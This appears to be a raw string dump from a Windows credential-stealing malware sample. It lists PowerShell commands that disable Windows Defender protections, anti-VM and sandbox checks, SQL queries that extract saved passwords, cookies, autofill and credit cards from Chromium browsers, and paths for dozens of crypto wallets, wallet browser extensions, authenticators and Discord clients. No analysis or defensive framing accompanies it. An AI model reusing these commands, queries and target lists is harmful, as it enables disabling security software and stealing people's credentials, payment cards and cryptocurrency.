DisableRoutinelyTakingAction
SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
DisableBehaviorMonitoring
SOFTWARE\Microsoft\Windows Defender\Features
TamperProtection
DisableAntiSpyware
DisableOnAccessProtection
DisableScanOnRealtimeEnable
DisableRealtimeMonitoring
DisableIOAVProtection
DisableRawWriteNotification
powershell
Get-MpPreference -verbose
Set-MpPreference -DisableIntrusionPreventionSystem $true
DisableBlockAtFirstSeen
DisableIntrusionPreventionSystem
Set-MpPreference -DisableIOAVProtection $true
SevereThreatDefaultAction
HighThreatDefaultAction
Set-MpPreference -MAPSReporting 0
MAPSReporting
Set-MpPreference -SubmitSamplesConsent 2
Set-MpPreference -HighThreatDefaultAction 6 -Force
Set-MpPreference -DisableRealtimeMonitoring $true
DisableArchiveScanning
DisablePrivacyMode
Set-MpPreference -DisableScriptScanning $true
SignatureDisableUpdateOnStartupWithoutEngine
Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
Set-MpPreference -ModerateThreatDefaultAction 6
LowThreatDefaultAction
Set-MpPreference -DisableBehaviorMonitoring $true
Set-MpPreference -SevereThreatDefaultAction 6
SubmitSamplesConsent
DisableScriptScanning
Set-MpPreference -DisableArchiveScanning $true
Set-MpPreference -DisablePrivacyMode $true
Set-MpPreference -LowThreatDefaultAction 6
ModerateThreatDefaultAction
Set-MpPreference -DisableBlockAtFirstSeen $true
"\nrtbf/
u{0:X4}
"\nrtbf
GetObjectNameInThread
catch GetObjectNameInThread
failed get process
svchost
wallets
wallet.dat
Electrum\wallets
Anoncoin
ElectronCash\wallets
Ethereum\wallets
Dogecoin
Bither
ElectrumLTC
Megacoin
Mincoin
Namecoin
Bither\bither.db
Ledger Live
Primecoin
Terracoin
Electrum-LTC\wallets
Atomic
multidoge.wallet
Local Storage
bither.db
GoldCoin (GLD)
IOCoin
Infinitecoin
Wasabi
app-store.json
Session Storage
Guarda
Exodus
WalletWasabi\Client\Wallets
MultiDoge
Monero
Ethereum
Armory
Binance\app-store.json
Jaxx\Local Storage
Monero\wallets
BBQCoin
Bitcoin
Coinomi\Coinomi\wallets
Coinomi
DashCore
Florincoin
Franko
Freicoin
Ixcoin
com.liberty.jaxx
Litecoin
Reddcoin
Daedalus Mainnet
MultiDoge\multidoge.wallet
YACoin
Jaxx Liberty
Exodus\exodus.wallet
Electrum
devcoin
digitalcoin
Binance
ElectronCash
atomic\Local Storage
Authy Desktop
error utils.copyDirectory
catch closeSqlite
failed unlcok©
Data Source=
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
webException
catch request
https://api.myip.com/
application/x-www-form-urlencoded; charset=utf-8
application/json, text/plain, */*
get ip0_1
https://api64.ipify.org/?format=json
get ip0_2
https://ipinfo.io/widget/demo/
https://ipinfo.io/
country
get ip1
demoInfo
countryCode
https://db-ip.com/demo/home.php?s=
get ip2
https://maxmind.com/geoip/v2.1/city/me
https://www.maxmind.com/en/locate-my-ip-address
iso_code
get ip3
1.1.1.1
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
{0:X2}
kernel32.dll
SYSTEM\CurrentControlSet\Services\VBoxGuest
SYSTEM\CurrentControlSet\Services\vmhgfs
VMWARE
VBoxGuest
VBoxDrv
VBoxSF
JohnDoe
HAL9TH
ENC893*_
catch getFilesInDirectory
\Network
os_crypt
encrypted_key
base64DecodeBytes
SELECT action_url, origin_url, username_value, password_value FROM logins
SQL logic error:
catch passwords sql
file is not a database
autofill
SELECT name, value FROM autofill
catch autofills sql
download_history
SELECT tab_url, target_path FROM downloads
catch dwnlhistory sql
SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, origin, billing_address_id, nickname FROM credit_cards
origin
SELECT name_on_card, exp_month, exp_year, last_four, nickname, bank_name, card_art_url, network FROM masked_credit_cards
bank_name
network
card_art_url
catch cc sql
cookies
Network\
SELECT host_key, is_httponly, path, is_secure, expires_utc, name, value, encrypted_value FROM cookies
catch cookies sql
history
SELECT url, last_visit_time FROM(SELECT url, last_visit_time, id FROM urls ORDER BY id DESC LIMIT 2500) ORDER BY id ASC
catch history sql
Local Storage\leveldb
\Local Extension Settings\
\CURRENT
\IndexedDB\chrome-extension_
_0.indexeddb.leveldb\CURRENT
\Sync Extension Settings\
CURRENT
_0.indexeddb.leveldb
Login Data
Web Data
Login Data For Account
chromeDefault -
catch chromeDefault
bhghoamapcdpbohphigoooaddinpkbai
Authenticator
cgeeodpfagjceefieflmdfphplkenlfk
EVER Wallet
nlbmnnijcnlegkjjpcfjclmcfggfefdm
nkddgncdjgjfcddamfgcmfnlhccnimig
SaturnWallet
nanjmdknhkinifnkgdcggcfnhdaammmj
GuildWallet
bhhhlbepdkbapadjdnnojkbgioiodbic
Solflare
dkdedlpgdmmkkfjabffeganieamfklkm
CyanoWallet
cphhlgmgameodnhkjdmkpanlelnlohao
NeoLine
fnjhmkhhmkbjkkabndcnnogagogbneec
RoninWallet
fhmfendgdocmcbmfikdcogofphimnkno
Sollet
cnmamaachppnkjgnildpdmkaakejnhae
AuroWallet
fhilaheimglignddkjgofkcbgekhenbh
Oxygen
dmkamcknogkgcdfhhbddcghachkejeap
fihkakfobkmkjojpchpfgcmhfjnmnfpi
BitAppWallet
lpilbniiabackdjcionkobglmddfbcjo
WavesKeeper
ibnejdfjmmkpcnlpebklmnkoeoihofec
TronLink
jojhfeoedkpkglbfimdfabpdfjaoolaf
PolymeshWallet
afbcbjpbpfadlkmhmclhkeeodmamcflc
MathWallet
bfnaelmomeimhlpmgjnjophhpkkoljpa
Phantom
cjmkndjhnagcfbpiemnkdpomccnjblmj
Finnie
jbdaocneiiinmjbjlgalhcelgbejmnid
NiftyWallet
ffnbelfdoeiohenkjibnmadjiehjhajb
fhbohimaelbohpjbbldcngcnapndodjp
BinanceChainWallet
acmacodkjbdgmoleebolmdjonilkdbch
odbfpeeihdkbihmopkbjmoonfanlbfcl
BraveWallet
epapihdplajcdnnkdeiahlgigofloibg
Sender Wallet
gjagmgiddbbciopjhllkdnddhcglnemk
Hashpack
aijcbedoijmgnlmjeegjaglmepbmpkpi
Leap Terra Wallet
egjidjbpglichdcondbcbdnbeeppgdph
Trust Wallet
nkbihfbeogaeaoehlefnkodbefgpgknn
MetaMask
cjelfplplebdjjenllpjcblmjkfcffne
Jaxx Liberty Extension
kncchdigobghenbbaddojjnnaogfppfj
iWallet
phkbamefinggmakgklpkljjmgibohnba
Pontem Aptos Wallet
ejjladinnckdgjemekebdpeokbikhfci
Petra Aptos Wallet
gojhcdgcpbpfigcaejpfhfegekdgiblk
Opera Wallet
oeljdldpnmdbchonielidgobddffflal
EOS Authenticator
ilgcnhelpchnceeipipijaljkblbcobl
GAuth Authenticator
amkmjjmmflddogmhpjloimipbofnfjih
Wombat
blnieiiffboillknjnepogjhkgnoapac
EQUALWallet
hpglfhgfnhbgpjdenjgmdgoeiappafln
dngmlblcodfobpdpecaadgfbcggfjfnm
Maiar DeFi Wallet
pdadjkfkgcafgbceimcpbkalnfnepbnk
KardiaChain
aeachknmefphepccionboohckonoeemg
coin98
aiifbnbfobpmeekipheeijimdpnlpgpp
kkpllkodjeloidieedojogacfhpaihoh
Eth and Polk Web3 Wallet
mcohilncbfahbmgdjkbpemcciiolgcge
OKX Wallet
mgffkfbidihjpoaomajlbgchddlicgpn
PaliWallet
aodkkagnadcbobfpggfnjeongemjbjca
Bolt X
fmblappgoiilbgafhjklehhfifbdocee
ForboleX
hmeobnfnfcmdkdcmlblgagmfpfboieaf
XDEFI Wallet
hcflpincpppdclinealmandijcmnkbgn
mnfifefkajgofkcjkemidiaecocnkjeh
TezBox
ookjlbkiijinhpmnjffcofjonbfbgaoc
Temple
jnkelfanjkeadonecabehalmbgpfodjm
hnfanknocfeofbddgcijnmhnfnkdnaad
Coinbase
fnnegphlobjdpkhecapkijjdkgcjhkib
Harmony
lpfcbjknijpeeillifnkikgncikgfhdo
kpfopkelmapcoipemfendmdcghnegimn
LiqualityWallet
aholpfdialjgjfhomihkjbmgjidlcdno
Exodus_E
bgpipimickeadkjlklgciifhnalhdjhe
GeroWallet
flpiciilemghbmfalicajoolhkkenfel
ICONex
kmhcihpebfmpgmihbkipmjlmmioameka
Eternl
nhnkbkgjikgcigadomkphalanndcapjk
CloverWallet
jnlgamecbpmbajjfhmmmlhejkemejdma
Braavos wallet
efbglgofoippbgcjepnhiblaibcnclgk
EMartian Aptos Wallet
imloifkgjagghnncjkhggdhalmcnfklk
Trezor Password Manager
chromeExtensions -
catch chromeExtensions
Discord
Local State
uCozMedia
uCozMedia\Uran\User Data
Vivaldi
Vivaldi\User Data
Kometa
Kometa\User Data
Elements Browser
Elements Browser\User Data
Orbitum
Orbitum\User Data
Dragon
Comodo\Dragon\User Data
Citrio
CatalinaGroup\Citrio\User Data
Coowon
Coowon\Coowon\User Data
liebao
liebao\User Data
Epic Privacy Browser
Epic Privacy Browser\User Data
Yandex
Yandex\YandexBrowser\User Data
NVIDIA
NVIDIA Corporation\NVIDIA GeForce Experience
Torch\User Data
ChromiumViewer
Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
QIP Surf
QIP Surf\User Data
DiscordPTB
discordptb
DiscordDevelopment
discorddevelopment
Opera Software
Uran\User Data
Chromodo
Chromodo\User Data
Amigo\User\User Data
Chrome
Google\Chrome\User Data
Iridium
Iridium\User Data
Comodo
Comodo\User Data
K-Melon
K-Melon\User Data
ChromePlus
MapleStudio\ChromePlus\User Data
7Star\7Star\User Data
CentBrowser
CentBrowser\User Data
Mail.Ru\Atom\User Data
NetboxBrowser
NetboxBrowser\User Data
Sputnik
Sputnik\Sputnik\User Data
360Browser
360Browser\Browser\User Data
LocalPrefs.json
DiscordCanary
discordcanary
Chrome (x86)
Google(x86)\Chrome\User Data
Chedot
Chedot\User Data
Maxthon3